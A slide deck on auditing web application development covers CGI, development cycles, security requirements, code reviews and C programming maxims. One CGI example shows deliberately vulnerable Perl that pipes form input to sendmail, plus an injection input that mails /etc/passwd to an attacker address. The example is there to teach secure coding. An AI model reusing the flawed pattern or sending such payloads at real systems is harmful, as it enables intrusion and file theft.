Auditing the Development of
Web-Based Applications
Jian Zhen
Overview
 Overview of WWW and HTTP
 Web-based Application Concepts
 Overview of the Development Cycles
 Security Requirements
 Web-based Application Security
 Application Code Reviews
World-Wide-Web (WWW)
 Invented by Tim Berners-Lee and others at
the European Laboratory for Particle
Physics (CERN)
 Based on hypertext--a system of
embedding links in text to link to other text
 The most popular way of linking to
resources on the Internet
WWW (Cont.)
 Hundres of millions of pages indexed by
search engines
 Tens of terabytes archived by Alexa
 Hundreds of millions users on the Web
WWW and HTTP
 Static Web Model
Request at port 80
Response and close
2nd request
2nd response & close
Web Brow ser
Web Server
Common Gateway Interface (CGI)
 Common
• An open specification
• Many languages
 Gateway
• Strength is not in what is does by itself
• Methods to access other systems
 Interface
• Well defined way to call features
CGI (cont.)
 A way of providing dynamic web content
•
•
•
•
Forms
Counters
Guest Books
Database Queries
 Used by most of the web-based
applications
The CGI Model
1
Internet
4
Browser Desktop
Web Server
3
1. HTTP Request
2. CGI Started, Input passed to CGI process
3. CGI hands back output
4. Output Returns to the browser
2
CGI
Process
on the
Web
Server
Web Applications
Browsers:
• Plug-ins
• Applets
• DHTML
• etc
Internet
Server:
• CGI
• Servlets
• ASP
• NSAPI
CORBA/ODBC
Database
Static
Pages
Web Applications
 Client side
•
•
•
•
•
HTML/DHTML
JavaScript, VBScript, PerlScript
Java
ActiveX
Plug-ins
Web Applications
 Server side
• Frontend: CGIs (Perl, C/C++), Java Servlets,
ISAPI, NSAPI, ASP, etc
• Middleware: CORBA, ODBC, DCOM, etc
• Backend: Oracle, Informix, Sybase, DB2, etc
Web Applications
 Complex distributed, Client/Server
applications
 Many elements involved and integrated
 Rapid development
 Requires more planning, design, and
control than “conventional” projects.
Web Development Cycles
Analysis
Design
Prototyping
Implementation
Testing
Web Development Cycles
 Analysis
• Feasibility study
• Identify requirements
• Involvment: your requirements
Web Development Cycles
 Design
• Design specifications
• Involvment: system interoperability, resiliency,
capacity planning, mature technologies,
security design
Design Specification
Business
Requirement
 Existing and Proposed
System Overview
 Hardware and
Software
Requirements
 System Schematic

System
Interoperability
 Operational
cycle/Workflow
System Modules
 Input-Output
 User Interface
Prototypes

Web Development Cycles
 Prototyping
•
•
•
•
Most time-consuming stage
Coding
Build, review, and refine prototype
Involvement: coding standards, effective
application development environment
Web Development Cycles
 Testing
•
•
•
•
Unit/System test plans
Module/Unit testing
System integration testing
Involvement: test plans, effective testing
environment, testing stages, code reviews
Web Development Cycles
 Delivery/Implementation
•
•
•
•
Install systems
Train users
Acceptance testing
Involvement: effective implementation
Security Requirements
 Privacy - All user information are protected
 Authentication/Access Control- Only
authorized users are allowed to access the
resources
 Integrity - User and application data cannot
be tempered with
 Auditing - Keeping audit logs and audit
trails and ensuring their integrity
Privacy
 Protecting users’ private information
•
•
•
•
SSN
Birthdates
Employee Ids
Passwords
 Technologies
• Encryption: DES, RSA, SSL
• Local vs. Network
Authentication
 Proof of Identity
 Required to enforce access control and
accountability, and achieve nonrepudiation
 Technologies
• username/password
• Smart Cards, SecurID
• Biometrics
Access Control
 Determine who is authorized to receive or
modify information
 Common mechanisms
• Mandatory Access Control (MAC)
– Owners cannot modify access list (SeOS)
• Discretionary Access Control (DAC)
– Owners are allowed to modify access (UNIX)
• Role-based Access Control (RBAC)
– Role granted provides necessary access
Auditing
 The process of collecting and recording
security-relevant activities on a system
 After-the-fact technique
 Audit logs are used as evidence
Data Encryption
 Confidentiality
• Scrambling data to unreadable format
 Integrity
• User and application data are not modified
 Technologies
• Public/Secret Key Encryption: RSA, DES
• Digital Signatures: DSS
• Hashes: MD5
Web-based Application Security
 Security flaws occur when software bugs
allow violation of security policy
 Different security flaw present different
threats
• Opening backdoors
• Stealing information or system resource
• Destroying or tempering data
Where Do Flaws Exist?
 Operating Systems
• UNIX, NT
 Support Software and Libraries
• Compilers, C Libraries
 Applications
• CGI programs, Netscape, Internet Explorer, vi,
Emacs, Sendmail, many others
Web-based Application Security
 Different layers of security
•
•
•
•
Network security
Operating System security
Web server security
Application security
 MUST PROTECT ALL LAYERS!!!
• Rootshell gets defaced!
Web-based Application Security
 Common Security Flaws
• Insufficient Input Validations
• Memory Cleansing, i.e. Cookie deletion on the
client
• Environmental Faults
• Buffer Overflows
• Race Conditions
Web-based Application Security
 CGI Programming Example
 What if we used this Perl code to send mail
to an address given in a fill-out form?
$mail_to= &get_name_from_input; #read the address
open (MAIL, “| /usr/lib/sendmail $mail_to”);
print MAIL “To: $mail_to\nFrom: me\n\nHello\n”;
close MAIL;
CGI Example (cont.)
 Look at the open() call
open (MAIL, “| /usr/lib/sendmail $mail_to”);
 What if the user entered
jerk@nowhere.com;mail
evilone@chaos.org</etc/passwd;
 Look at the open again!
/usr/lib/sendmail jerk@nowhere.com; mail
evilone@chaos.org</etc/passwd;
Web-based Application Security
 Never Assume That:
• The input to a field from a selection list will be
one of the items on the list
• A browser will never send more than the
maximum length of an input field
• The field in the QUERY_STRING variable will
match the ones on the page
• The QUERY_STRING variable will correspond to
something that is within valid HTTP specs
Web-based Application Security
 AVOID shell programming!
 Always use full pathnames for both
commands and filenames, or explicitly set
the PATH variable
 Don’t depend on the current directory
 Use and check all return codes from
system calls
Web-based Application Security
 Have internal consistency checking code
 Include lots of logging
 Review publicly available programs
 Review error logs
 Make the critical portion of the program as
simple as possible
 Read through the code
Code Reviews
 Code Inspection
• Formal
 Walk Through
 Code Reading
• Informal
Code Reviews
 Code Inspection
•
•
•
•
Formal code review
Emphasize on defect detection, not correction
Reviewers prepare beforehand
Distinct roles are assigned
Code Reviews
 Walkthroughs
• Usually hosted and moderated by the author of
the design or code under review
• To improve the technical quality of a program
• Emphasize on error detection
Code Reviews
 Code Reading
• Read source code and look for errors
• Comment on design, style, readability,
maintainability, and efficiency
• Informal meetings
• Probably most common in web-based
application environment
Appendix
 The Ten Commandments for C
Programmers
The Ten Commandments for C
Programmers


Thou shalt run lint frequently and study its
pronouncements with care, for verily its perception
and judgement oft exceed thine.
Thou shalt not follow the NULL pointer, for chaos and
madness await thee at its end.
The Ten Commandments for C
Programmers (cont.)


Thou shalt cast all function arguments to the
expected type if they are not of that type already, een
when thou are convinced that this is unnecessary,
lest the take cruel vengeance upon thee when thou
least expect it.
If thy header files fail to declare the return types of
thy library functions, thou shalt declare them thyself
with the most meticulous care, lest grievous harm
befall thy program.
The Ten Commandments for C
Programmers (cont.)


Thou shalt check the array bounds of all strings
(indeed, all arrays,) for surely where thou typest “foo”
someone someday shall type
“supercalifragilisticexpialidocious.”
If a function be advertised to return an error code in
the event of difficulties, thou shalt check for that
code, yea, even though the checks triple the size of
thy code and produce aches in thy typing fingers, for
if thou thinkest “it cannot happen to me,” the gods
shall surely punish thee for thy arrogance.
The Ten Commandments for C
Programmers (cont.)


Thou shalt study thy libraries and strive not to reinvent them without cause, that thy code may be short
and readable and thy days pleasant and productive.
Thou shalt make thy program’s purpose and structure
clear to thy fellow man by using the One True Brace
Style, even if thou likest it not, for thy creativity is
better used in solving problems than in creating
beautiful new impediments to understanding.
The Ten Commandments for C
Programmers (cont.)


Thy external identifiers shall be unique in the first six
characters, though this harsh discipline be irksome and the
years of its necessity stretch before thee seemingly without
end, lest thou tear thy hair out and go mad on that fateful day
when thou desirest to make thy program run on an old
system.
Thou shalt foreswear, renounce, and abjure the vile heresy
which claimeth that “All the world’s a VAX,” and have no
commerce with the benighted heathens who cling to this
barbarous belif, that the days of thy program may be long
even though the days of thy current machine be short.